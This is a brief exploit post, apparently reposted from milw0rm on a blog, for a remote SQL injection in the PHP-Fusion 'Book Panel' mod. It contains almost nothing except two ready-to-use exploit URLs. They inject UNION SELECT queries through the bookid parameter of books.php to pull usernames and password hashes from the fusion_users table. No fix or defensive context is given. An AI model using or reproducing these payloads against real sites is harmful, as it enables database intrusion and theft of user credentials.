PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability

Author: elusiven from Poland
Contact: elusivenpl@gmail.com
Greetings: Fusi0n Group

Exploit:
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--

# milw0rm

No comments:

Post a Comment